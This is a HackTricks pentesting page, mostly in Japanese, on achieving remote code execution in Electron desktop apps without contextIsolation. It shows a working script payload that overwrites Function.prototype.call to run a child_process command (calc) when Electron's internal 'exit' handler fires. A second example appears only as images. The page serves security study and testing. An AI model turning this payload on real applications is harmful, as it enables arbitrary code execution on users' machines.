hacktricks/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

# Electron contextIsolation RCE via Electron internal code

{{#include ../../../banners/hacktricks-training.md}}

## Example 1

Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)

"exit" イベントリスナーは、ページの読み込みが開始されるときに内部コードによって常に設定されます。このイベントは、ナビゲーションの直前に発生します:
```javascript
process.on("exit", function () {
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})
```
{{#ref}}
https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36
{{#endref}}

![](<../../../images/image (1070).png>)

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- もはや存在しません

次はここに行きます:

![](<../../../images/image (793).png>)

ここで「self」はNodeのプロセスオブジェクトです:

![](<../../../images/image (700).png>)

プロセスオブジェクトは「require」関数への参照を持っています:
```
process.mainModule.require
```
handler.callがprocessオブジェクトを受け取るため、任意のコードを実行するためにそれを上書きすることができます:
```html
<script>
Function.prototype.call = function (process) {
process.mainModule.require("child_process").execSync("calc")
}
location.reload() //Trigger the "exit" event
</script>
```
## 例 2

**プロトタイプ汚染からのrequireオブジェクトを取得**。 From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81)

漏洩:

<figure><img src="../../../images/image (279).png" alt=""><figcaption></figcaption></figure>

エクスプロイト:

<figure><img src="../../../images/image (89).png" alt=""><figcaption></figcaption></figure>

{{#include ../../../banners/hacktricks-training.md}}